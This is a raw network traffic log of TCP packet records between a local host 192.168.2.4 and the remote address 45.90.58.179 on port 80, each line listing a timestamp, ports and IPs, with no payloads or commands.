Jul 6, 2021 14:31:07.690331936 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.690346956 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.690357924 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.690371037 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.690391064 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.690401077 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.690421104 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.690424919 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.690447092 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.690449953 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.690474033 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.690475941 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.690496922 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.690500021 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.690522909 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.690526962 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.690546989 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.690551996 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.690570116 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.690586090 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.690593004 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.690617085 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.690622091 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.690639019 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.690663099 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.690665007 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.690686941 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.690707922 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.690712929 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.690735102 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.690737963 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.690759897 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.690772057 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.690784931 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.690809965 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.690814018 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.690833092 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.690855980 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.690856934 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.690880060 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.690893888 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.690907001 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.690922976 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.690931082 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.690953016 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.690960884 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.690978050 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.690993071 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.690999985 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.691024065 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.691028118 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.691046953 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.691067934 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.691071033 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.691097975 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.691109896 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.691135883 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.691140890 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.691165924 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.691189051 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.691194057 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.691211939 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.691235065 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.691241980 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.691262007 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.691282034 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.691282034 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.691308022 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.691346884 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.710284948 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.710319042 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.710345030 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.710369110 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.710392952 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.710407019 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.710416079 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.710443974 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.710472107 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.710474014 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.710496902 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.710500956 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.710521936 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.710542917 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.710546017 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.710570097 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.710585117 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.710593939 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.710607052 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.710619926 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.710644007 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.710648060 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.710670948 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.710681915 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.710695982 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.710716963 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.710720062 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.710742950 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.710761070 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.710767031 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.710793018 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.710824966 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.747874022 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.747910023 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.747935057 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.747957945 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.747982025 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.747992992 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.748007059 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.748032093 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.748053074 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.748056889 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.748080969 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.748083115 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.748111010 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.748111963 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.748137951 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.748137951 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.748162031 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.748162985 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.748188019 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.748191118 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.748212099 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.748214006 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.748236895 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.748239040 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.748261929 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.748265982 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.748286009 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.748295069 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.748313904 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.748316050 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.748339891 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.748362064 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.748363018 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.748388052 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.748398066 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.748413086 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.748424053 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.748435974 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.748456001 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.748461008 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.748485088 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.748486996 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.748512030 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.748512030 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.748536110 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.748541117 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.748564005 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.748565912 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.748593092 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.748598099 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.748613119 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.748617887 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.748637915 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.748642921 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.748663902 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.748667955 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.748692036 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.748724937 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.757833958 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.757869005 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.757894039 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.757916927 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.757944107 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.757945061 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.757970095 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.757991076 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.757992983 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.758013964 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.758059025 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.758060932 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.759156942 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.786262989 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.786300898 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.786331892 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.786355019 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.786385059 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.786396980 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.786400080 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.786420107 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.786422014 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.786447048 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.786449909 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.786469936 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.786478996 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.786497116 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.786520004 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.786520958 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.786546946 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.786556959 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.786576986 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.786587000 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.786604881 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.786628008 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.786628962 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.786657095 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.786658049 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.786684036 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.786686897 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.786710024 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.786736012 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.786756992 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.786766052 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.786780119 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.786788940 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.786806107 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.786815882 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.786830902 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.786853075 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.786855936 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.786880970 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.786891937 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.786909103 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.786930084 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.786935091 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.786958933 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.786961079 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.786983967 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.786984921 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.787013054 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.787019014 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.787036896 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.787039995 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.787060022 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.787077904 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.787086010 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.787111998 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.787147999 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.787156105 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.787177086 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.787180901 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.787185907 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.787199974 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.787199974 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.787225008 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.787250042 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.787257910 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.787276030 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.787285089 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.787301064 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.787326097 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.787326097 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.787354946 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.787358046 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.787380934 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.787395000 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.787411928 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.787435055 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.787437916 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.787468910 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.787471056 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.787494898 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.787501097 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.787522078 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.787542105 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.787561893 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.787586927 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.787595034 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.787602901 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.787606001 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.787628889 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.787652969 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.787662029 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.787678003 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.787699938 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.787705898 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.787728071 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.787733078 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.787756920 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.787759066 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.787781954 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.787786007 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.787808895 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.787812948 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.787833929 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.787837982 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.787867069 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.787880898 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.795403004 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.795439959 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.795461893 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.795486927 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.795492887 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.795511961 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.795540094 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.795541048 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.795605898 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.795751095 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.795784950 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.795795918 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.795825005 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.795835018 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.795850992 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.795866013 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.795876980 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.795901060 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.795901060 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.795943975 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.795989990 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.796010017 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.796035051 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.796076059 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.796091080 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.796114922 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.796135902 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.796170950 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.824832916 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.824871063 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.824892998 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.824918985 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.824924946 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.824942112 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.824953079 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.824966908 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.824981928 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.824992895 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.825020075 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.825022936 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.825047016 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.825048923 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.825069904 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.825071096 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.825098038 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.825099945 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.825120926 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.825125933 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.825144053 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.825153112 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.825170040 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.825177908 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.825189114 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.825203896 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.825212955 CEST	49882	80	192.168.2.4	45.90.58.179
